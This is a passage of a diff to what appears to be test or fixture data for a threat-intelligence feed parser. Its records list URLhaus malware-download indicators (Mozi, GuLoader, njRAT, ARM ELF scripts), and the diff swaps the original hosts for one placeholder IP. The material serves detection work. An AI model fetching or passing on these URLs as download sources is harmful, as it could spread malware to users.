"ingested": "2021-12-13T08:40:08.028949600Z", + "original": "{\"id\":\"960954\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960954/\",\"url\":\"http://89.160.20.156:48224/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:05:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28942,18 +28942,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://113.201.171.61:37716/Mozi.m", + "original": "http://89.160.20.156:37716/Mozi.m", "scheme": "http", "port": 37716, - "domain": "113.201.171.61", - "full": "http://113.201.171.61:37716/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:37716/Mozi.m" }, - "ip": "113.201.171.61" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694706582Z", - "original": "{\"id\":\"960952\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960952/\",\"url\":\"http://113.201.171.61:37716/Mozi.m\",\"url_status\":\"online\",\"host\":\"113.201.171.61\",\"date_added\":\"2021-01-14 16:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028956300Z", + "original": "{\"id\":\"960952\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960952/\",\"url\":\"http://89.160.20.156:37716/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:10 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -28991,18 +28991,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://101.108.135.252:60524/Mozi.m", + "original": "http://89.160.20.156:60524/Mozi.m", "scheme": "http", "port": 60524, - "domain": "101.108.135.252", - "full": "http://101.108.135.252:60524/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:60524/Mozi.m" }, - "ip": "101.108.135.252" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694709608Z", - "original": "{\"id\":\"960951\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960951/\",\"url\":\"http://101.108.135.252:60524/Mozi.m\",\"url_status\":\"offline\",\"host\":\"101.108.135.252\",\"date_added\":\"2021-01-14 16:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028962900Z", + "original": "{\"id\":\"960951\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960951/\",\"url\":\"http://89.160.20.156:60524/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29049,7 +29049,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694712764Z", + "ingested": "2021-12-13T08:40:08.028969600Z", "original": "{\"id\":\"960946\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960946/\",\"url\":\"http://urlfrance.fr/code/dd.txt\",\"url_status\":\"offline\",\"host\":\"urlfrance.fr\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"Encoded\",\"njRAT\",\"rat\"]}", "category": "threat", "type": "indicator", 
@@ -29089,18 +29089,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://136.34.57.224:49988/bin.sh", + "original": "http://89.160.20.156:49988/bin.sh", "scheme": "http", "port": 49988, - "domain": "136.34.57.224", - "full": "http://136.34.57.224:49988/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49988/bin.sh" }, - "ip": "136.34.57.224" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694715950Z", - "original": "{\"id\":\"960947\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960947/\",\"url\":\"http://136.34.57.224:49988/bin.sh\",\"url_status\":\"online\",\"host\":\"136.34.57.224\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028976200Z", + "original": "{\"id\":\"960947\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960947/\",\"url\":\"http://89.160.20.156:49988/bin.sh\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29138,18 +29138,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.50.64.136:42857/Mozi.m", + "original": "http://89.160.20.156:42857/Mozi.m", "scheme": "http", "port": 42857, - "domain": "115.50.64.136", - "full": "http://115.50.64.136:42857/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42857/Mozi.m" }, - "ip": "115.50.64.136" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694719086Z", - "original": "{\"id\":\"960948\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960948/\",\"url\":\"http://115.50.64.136:42857/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.50.64.136\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028982900Z", + "original": "{\"id\":\"960948\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960948/\",\"url\":\"http://89.160.20.156:42857/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29188,18 +29188,18 @@ "url": { "path": "/bin.sh", "extension": "sh", - "original": "http://200.52.228.27:44751/bin.sh", + "original": "http://89.160.20.156:44751/bin.sh", "scheme": "http", "port": 44751, - "domain": "200.52.228.27", - "full": "http://200.52.228.27:44751/bin.sh" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:44751/bin.sh" }, - "ip": "200.52.228.27" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694722522Z", - "original": "{\"id\":\"960949\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960949/\",\"url\":\"http://200.52.228.27:44751/bin.sh\",\"url_status\":\"offline\",\"host\":\"200.52.228.27\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", + "ingested": "2021-12-13T08:40:08.028989600Z", + "original": "{\"id\":\"960949\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960949/\",\"url\":\"http://89.160.20.156:44751/bin.sh\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"geenensp\",\"larted\":\"true\",\"tags\":[\"32-bit\",\"arm\",\"elf\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29237,18 +29237,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://115.63.203.134:47719/Mozi.m", + "original": "http://89.160.20.156:47719/Mozi.m", "scheme": "http", "port": 47719, - "domain": "115.63.203.134", - "full": "http://115.63.203.134:47719/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47719/Mozi.m" }, - "ip": "115.63.203.134" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694726159Z", - "original": "{\"id\":\"960950\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960950/\",\"url\":\"http://115.63.203.134:47719/Mozi.m\",\"url_status\":\"online\",\"host\":\"115.63.203.134\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.028996300Z", + "original": "{\"id\":\"960950\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960950/\",\"url\":\"http://89.160.20.156:47719/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 16:04:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29286,18 +29286,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://181.194.120.182:38133/Mozi.m", + "original": "http://89.160.20.156:38133/Mozi.m", "scheme": "http", "port": 38133, - "domain": "181.194.120.182", - "full": "http://181.194.120.182:38133/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:38133/Mozi.m" }, - "ip": "181.194.120.182" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694729786Z", - "original": "{\"id\":\"960945\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960945/\",\"url\":\"http://181.194.120.182:38133/Mozi.m\",\"url_status\":\"offline\",\"host\":\"181.194.120.182\",\"date_added\":\"2021-01-14 15:59:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029003100Z", + "original": "{\"id\":\"960945\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960945/\",\"url\":\"http://89.160.20.156:38133/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:59:12 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"07ac0n\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29343,7 +29343,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694734024Z", + "ingested": "2021-12-13T08:40:08.029009700Z", "original": "{\"id\":\"960944\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960944/\",\"url\":\"http://www.sowetoson.com/new/Host_yjwloaz52.bin\",\"url_status\":\"online\",\"host\":\"www.sowetoson.com\",\"date_added\":\"2021-01-14 15:57:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29390,7 +29390,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694738262Z", + "ingested": "2021-12-13T08:40:08.029066700Z", "original": "{\"id\":\"960942\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960942/\",\"url\":\"https://www.agamagroup.com.ng/zxc/janomo_uGdNtpvRY170.bin\",\"url_status\":\"online\",\"host\":\"www.agamagroup.com.ng\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"abused_legit_malware\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", @@ -29437,7 +29437,7 @@ } }, "event": { - "ingested": "2021-12-13T06:08:08.694773149Z", + "ingested": "2021-12-13T08:40:08.029092100Z", "original": "{\"id\":\"960943\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960943/\",\"url\":\"https://onedrive.live.com/download?cid=8FE9EB3F9398B325\u0026resid=8FE9EB3F9398B325%21126\u0026authkey=AOzL9FiDhEYRkm8\",\"url_status\":\"online\",\"host\":\"onedrive.live.com\",\"date_added\":\"2021-01-14 15:57:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"abuse_ch\",\"larted\":\"true\",\"tags\":[\"encrypted\",\"GuLoader\"]}", "category": "threat", "type": "indicator", 
@@ -29476,18 +29476,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.93.22.84:46462/Mozi.m", + "original": "http://89.160.20.156:46462/Mozi.m", "scheme": "http", "port": 46462, - "domain": "59.93.22.84", - "full": "http://59.93.22.84:46462/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:46462/Mozi.m" }, - "ip": "59.93.22.84" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694781745Z", - "original": "{\"id\":\"960941\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960941/\",\"url\":\"http://59.93.22.84:46462/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.93.22.84\",\"date_added\":\"2021-01-14 15:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029099300Z", + "original": "{\"id\":\"960941\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960941/\",\"url\":\"http://89.160.20.156:46462/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29525,18 +29525,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.95.173.7:39046/Mozi.m", + "original": "http://89.160.20.156:39046/Mozi.m", "scheme": "http", "port": 39046, - "domain": "59.95.173.7", - "full": "http://59.95.173.7:39046/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39046/Mozi.m" }, - "ip": "59.95.173.7" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694787055Z", - "original": "{\"id\":\"960940\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960940/\",\"url\":\"http://59.95.173.7:39046/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.95.173.7\",\"date_added\":\"2021-01-14 15:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029106Z", + "original": "{\"id\":\"960940\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960940/\",\"url\":\"http://89.160.20.156:39046/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:05 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29574,18 +29574,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.224.66.103:47418/Mozi.m", + "original": "http://89.160.20.156:47418/Mozi.m", "scheme": "http", "port": 47418, - "domain": "42.224.66.103", - "full": "http://42.224.66.103:47418/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:47418/Mozi.m" }, - "ip": "42.224.66.103" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694792265Z", - "original": "{\"id\":\"960934\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960934/\",\"url\":\"http://42.224.66.103:47418/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.224.66.103\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029112700Z", + "original": "{\"id\":\"960934\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960934/\",\"url\":\"http://89.160.20.156:47418/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29623,18 +29623,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.228.37.137:42287/Mozi.m", + "original": "http://89.160.20.156:42287/Mozi.m", "scheme": "http", "port": 42287, - "domain": "42.228.37.137", - "full": "http://42.228.37.137:42287/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:42287/Mozi.m" }, - "ip": "42.228.37.137" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694796924Z", - "original": "{\"id\":\"960935\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960935/\",\"url\":\"http://42.228.37.137:42287/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.228.37.137\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029119200Z", + "original": "{\"id\":\"960935\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960935/\",\"url\":\"http://89.160.20.156:42287/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29672,18 +29672,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://59.99.41.229:49596/Mozi.m", + "original": "http://89.160.20.156:49596/Mozi.m", "scheme": "http", "port": 49596, - "domain": "59.99.41.229", - "full": "http://59.99.41.229:49596/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:49596/Mozi.m" }, - "ip": "59.99.41.229" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694801032Z", - "original": "{\"id\":\"960936\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960936/\",\"url\":\"http://59.99.41.229:49596/Mozi.m\",\"url_status\":\"offline\",\"host\":\"59.99.41.229\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029125800Z", + "original": "{\"id\":\"960936\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960936/\",\"url\":\"http://89.160.20.156:49596/Mozi.m\",\"url_status\":\"offline\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29721,18 +29721,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://42.229.232.193:39815/Mozi.m", + "original": "http://89.160.20.156:39815/Mozi.m", "scheme": "http", "port": 39815, - "domain": "42.229.232.193", - "full": "http://42.229.232.193:39815/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:39815/Mozi.m" }, - "ip": "42.229.232.193" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694805049Z", - "original": "{\"id\":\"960937\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960937/\",\"url\":\"http://42.229.232.193:39815/Mozi.m\",\"url_status\":\"online\",\"host\":\"42.229.232.193\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029132500Z", + "original": "{\"id\":\"960937\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960937/\",\"url\":\"http://89.160.20.156:39815/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29770,18 +29770,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://61.53.104.80:36568/Mozi.m", + "original": "http://89.160.20.156:36568/Mozi.m", "scheme": "http", "port": 36568, - "domain": "61.53.104.80", - "full": "http://61.53.104.80:36568/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:36568/Mozi.m" }, - "ip": "61.53.104.80" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694809167Z", - "original": "{\"id\":\"960938\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960938/\",\"url\":\"http://61.53.104.80:36568/Mozi.m\",\"url_status\":\"online\",\"host\":\"61.53.104.80\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029141100Z", + "original": "{\"id\":\"960938\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960938/\",\"url\":\"http://89.160.20.156:36568/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29819,18 +29819,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://222.141.45.45:32954/Mozi.m", + "original": "http://89.160.20.156:32954/Mozi.m", "scheme": "http", "port": 32954, - "domain": "222.141.45.45", - "full": "http://222.141.45.45:32954/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:32954/Mozi.m" }, - "ip": "222.141.45.45" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694813395Z", - "original": "{\"id\":\"960939\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960939/\",\"url\":\"http://222.141.45.45:32954/Mozi.m\",\"url_status\":\"online\",\"host\":\"222.141.45.45\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029147800Z", + "original": "{\"id\":\"960939\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960939/\",\"url\":\"http://89.160.20.156:32954/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:52:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29868,18 +29868,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://211.195.3.122:57752/Mozi.m", + "original": "http://89.160.20.156:57752/Mozi.m", "scheme": "http", "port": 57752, - "domain": "211.195.3.122", - "full": "http://211.195.3.122:57752/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:57752/Mozi.m" }, - "ip": "211.195.3.122" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694817973Z", - "original": "{\"id\":\"960933\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960933/\",\"url\":\"http://211.195.3.122:57752/Mozi.m\",\"url_status\":\"online\",\"host\":\"211.195.3.122\",\"date_added\":\"2021-01-14 15:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", + "ingested": "2021-12-13T08:40:08.029154400Z", + "original": "{\"id\":\"960933\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960933/\",\"url\":\"http://89.160.20.156:57752/Mozi.m\",\"url_status\":\"online\",\"host\":\"89.160.20.156\",\"date_added\":\"2021-01-14 15:51:06 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not listed\"},\"reporter\":\"lrz_urlhaus\",\"larted\":\"true\",\"tags\":[\"elf\",\"Mozi\"]}", "category": "threat", "type": "indicator", "kind": "enrichment" 
@@ -29917,18 +29917,18 @@ "url": { "path": "/Mozi.m", "extension": "m", - "original": "http://186.33.123.115:52221/Mozi.m", + "original": "http://89.160.20.156:52221/Mozi.m", "scheme": "http", "port": 52221, - "domain": "186.33.123.115", - "full": "http://186.33.123.115:52221/Mozi.m" + "domain": "89.160.20.156", + "full": "http://89.160.20.156:52221/Mozi.m" }, - "ip": "186.33.123.115" + "ip": "89.160.20.156" } }, "event": { - "ingested": "2021-12-13T06:08:08.694821821Z", - "original": "{\"id\":\"960932\",\"urlhaus_reference\":\"https://urlhaus.abuse.ch/url/960932/\",\"url\":\"http://186.33.123.115:52221/Mozi.m\",\"url_status\":\"online\",\"host\":\"186.33.123.115\",\"date_added\":\"2021-01-14 15:51:04 UTC\",\"threat\":\"malware_download\",\"blacklists\":{\"spamhaus_dbl\":\"not listed\",\"surbl\":\"not 